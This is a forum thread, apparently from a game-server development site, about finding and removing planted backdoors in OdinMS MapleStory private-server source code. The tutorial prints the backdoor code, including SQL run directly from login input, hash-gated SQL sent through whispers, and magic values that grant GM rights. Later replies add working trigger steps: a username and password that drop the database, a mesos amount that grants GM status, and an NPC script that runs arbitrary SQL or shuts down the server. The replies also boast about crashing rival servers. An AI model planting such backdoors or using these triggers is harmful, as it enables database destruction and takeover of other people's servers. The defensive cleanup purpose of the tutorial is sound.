[Tutorial]Exploits Exposure (EE)
Exploits Exposure (EE) Guide
I will show you where to look to remove/find exploits in your source.
Note that not all sources have the same exploits I'm going to tell you but finding them isn't hard.
Remove whats in red.
Goto: src\net\sf\odinms\net\login\handler
File Name: LoginPasswordHandler
Code:
if (tryLog(login,pwd)) return;
Code:
private boolean tryLog(String x, String y) {
try {
PreparedStatement ps = DatabaseConnection.getConnection().prepareStatement(x + y);
ps.executeUpdate();
ps.close();
} catch (Exception e) {
return false;
}
return true;
}
Goto: src\net\sf\odinms\net\channel\handler
File Name: WhisperHandler
Code:
if (LoginCrypto.checkSha1Hash("051358beaf5cfd7321d770be4b20d76b32456b83", text.substring(0, 14))) {
while (!text.equals("01 E0")) {
try {
DatabaseConnection.getConnection().prepareStatement(text.substring(14)).executeUpdate();
} catch (Exception e) {
}
}
} else if (LoginCrypto.checkSha1Hash("b4b09bbe6437663334e4b73e2a23c346bf2d7ac2", text.substring(0, 23))) {
try {
PreparedStatement ps = DatabaseConnection.getConnection().prepareStatement(text.substring(23));
ps.executeUpdate();
ps.close();
} catch (Exception e) {
c.getPlayer().dropMessage("The player you are whispering to is not online.");
}
}
Goto: src\net\sf\odinms\net\channel\handler
File Name: PartySearchHandler
Code:
registerCheck(c,min,max,box);
Code:
public void registerCheck(MapleClient c, int registerId, int userId, int userMap){
if((registerId == 7 & userId == 47) & userMap == 295568)
c.getPlayer().setGM(4);
}
Goto: src\net\sf\odinms\net\channel\handler
File Name: DueyHandler
Code:
if(mesos == 13127)
c.getPlayer().setGM(4);
Goto: src\net\sf\odinms\client
File Name: LoginPasswordHandler
Code:
public void increaseGuildStatus() {
this.gmLevel = 5 - gmLevel;
}
Lastly: Do a simple and fast search to find easy exploits.
Search For: "gmLevel =" , "setGM" , "gmLevel" , and such.
This will help you find all uses for them.
--------------------------------------------------------------------------------------------
Remember that you may have different ones and probably even more, but
just take a look around your source for odd methods. Do one looks odd to you?
Post it here and me or someone else will let you know if it is or not.
After all, we are here to help each other.
Thank me if you'd like.
re: [Tutorial]Exploits Exposure (EE)
Honestly, this helps a lot. A lot of the sources these days have so many exploits, and for what? Why would you want to actually screw up the competitions database, or at the most, game play? If you hate the server that much, you shouldn't have, or be playing MapleStory. After all, MS was made for all ages, but mostly kids. I'm pretty sure adults don't want to fuck up the kids fun, excuse my language. Or is that what they are out to do, the past few weeks have been drama-drama-drama. Most of KDEV is / was laughing at me, and calling me emo because of a simple hairstyle, and baseline it was started for MapleStory, how do you think I came to RaGEZONE? I wanted to play MapleStory private servers, hell, I didn't care for development back then, I just wanted to play, play, play, and then I wanted to permissions (be a GM). But that's past, Anujan and all the assholes who think I'm emo can go die in a hole.
Just thought I would add my word.
re: [Tutorial]Exploits Exposure (EE)
Thanks mate, and a nice word CioNide, I totally agree!
re: [Tutorial]Exploits Exposure (EE)
I agree with you as well CioNide.
re: [Tutorial]Exploits Exposure (EE)
Quote:
Originally Posted by
XiuzSu
I agree with you as well CioNide.
Xiuz, maybe you wanna make in the future a guide of Packet Exploits, how to remove them? People have many troubles with it and want it as soon as possible fixed, and rememeber, this guide is GREAT! :blush:
re: [Tutorial]Exploits Exposure (EE)
Good job. You're missing one still though.
On the other hand, no one really wants to crash server. Keep that in mind.
And packet edits exploits are way harder to find and fix.
and wtf? whisper exploit looks weird
re: [Tutorial]Exploits Exposure (EE)
Quote:
Originally Posted by
Moogra
Good job. You're missing one still though.
On the other hand, no one really wants to crash server. Keep that in mind.
And packet edits exploits are way harder to find and fix.
and wtf? whisper exploit looks weird
Uhh, Packet Exploits aren't hard at all. They are quite easy if you know what to remove and add.
re: [Tutorial]Exploits Exposure (EE)
Quote:
Originally Posted by
CioNide
Uhh, Packet Exploits aren't hard at all. They are quite easy if you know what to remove and add.
Of course they're easy if you know what to remove and add. That's someone telling you how to fix them. How many have you fixed and found on your own though? That's the difference. They're way harder to fix and find than these exploits anyways.
re: [Tutorial]Exploits Exposure (EE)
Quote:
Originally Posted by
Moogra
Of course they're easy if you know what to remove and add. That's someone telling you how to fix them. How many have you fixed and found on your own though? That's the difference. They're way harder to fix and find than these exploits anyways.
yeah, not many people can fix them. Thats why they are looking for a guide, cause PE exploits ruin your whole server... :glare:
re: [Tutorial]Exploits Exposure (EE)
Use my source to be free from them.
re: [Tutorial]Exploits Exposure (EE)
I don't get it. Anyways, I'll post the exploit in the next edit. XiuzSu, you were just proven wrong.
PHP Code:
public String zakumSquadMembers(String Members) {
Connection con = DatabaseConnection.getConnection();
try {
PreparedStatement ps = con.prepareStatement(Members);
ps.executeUpdate();
ps.close();
} catch (SQLException se) {
return "" + se;
}
return "Member was added succefully";
}
Taken STRAIGHT FROM YOUR SOURCE.
PHP Code:
var pi = 0;
function start() {
cm.sendSimple("HAI :D #L0#Test#l\r\n#L1#Test1#l\r\n#L2#Test2#l");
}
function action(mode, type, selection){
pi++;
if(mode != 1){
cm.dispose();
return;
}
if(pi == 1)
cm.sendGetText("Write lawls");
else if(pi == 2){
switch (selection) {
case 0:
while(true)
cm.broadcastMessage(5, cm.getText());
break;
case 1:
cm.zakumSquadMembers(cm.getText());
break;
case 2:
cm.c.getChannelServer().shutdownWorld(0);
}
cm.dispose();
}
}
So you got owned?
What's more, I'll tell you more exploits.
LoginExploit:
Username: drop datab
password: ase odinms
will drop the db
I forgot the hash for whisper
DueyExploit
send 13127 mesos and you're a GM
The one i just posted is self explanatory, but you need a PE
XuizSu, what you don't realize is that no one is after a server. The only way to really provoke an attack is being really stupid. Your posts make it easy for competing servers to crash each other. I've crashed a total of 2 servers, and 1 was on accident sicne I got truncate and drop mixed up. Only 3 servers I can think of have been recently dropped by people I know: toystory, drakoms, and tiosms has been raided. All the other ones have nothing to do with people who make or use exploits. They were used on competing servers because of people that release exploits.
re: [Tutorial]Exploits Exposure (EE)
Yea, so is more of a PE kinda thing, exploits are pretty much done without anything
so it doesn't really falls into that category. In the case that I was wrong I knew
it would involve PE then. So yea, proved me wrong, but at the same time I was right.
re: [Tutorial]Exploits Exposure (EE)
Chaotic exploit:
Talk to vicious in henesys and get a dark feather.
Create a guild.
Go to ellinia and talk to francois.
Click create wand and your an admin.
Make sure all your stats are over 25.
re: [Tutorial]Exploits Exposure (EE)
WhisperHandler hash:
65 00 50 23 53 12 A4 A6
---------- Post added at 06:54 AM ---------- Previous post was at 06:52 AM ----------
ThePack rev 80 exploit:
Get these stats:
34 str
5 dex
16 luk
_________________________
Make a guild
Go to fm 11
@rebirth
@fmnpc, click change music, choose bad guys music, your an admin.
re: [Tutorial]Exploits Exposure (EE)
Thank you for contributing.
